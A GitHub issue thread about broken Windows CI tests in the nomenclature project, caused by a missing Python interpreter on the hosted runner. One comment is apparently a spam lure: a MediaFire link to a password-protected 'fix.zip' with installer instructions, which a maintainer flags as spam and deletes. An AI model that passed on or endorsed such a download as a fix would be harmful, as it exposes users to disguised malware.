### ISSUE TITLE
Windows tests currently (Aug 29 2024) broken

### ISSUE THREAD

**Issue by phackstock** [IAMconsortium/nomenclature#372]
Most likely a GH error:

```console
Command ['D:\\a\\nomenclature\\nomenclature\\.venv\\Scripts\\python.exe', '-I', '-W', 'ignore', '-c', 'import sys\n\nif hasattr(sys, "real_prefix"):\n    print(sys.real_prefix)\nelif hasattr(sys, "base_prefix"):\n    print(sys.base_prefix)\nelse:\n    print(sys.prefix)\n'] errored with the following return code 103

Error output:
No Python at '"C:\hostedtoolcache\windows\Python\3.12.4\x64\python.exe'
```

as seen here: https://github.com/IAMconsortium/nomenclature/actions/runs/10617131911/job/29429187755?pr=371.

We'll disable the Windows tests for now and come back when the issue is fixed.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by danielhuppmann** [comment]
Seems there is a spam attach, deleted the previous comment.
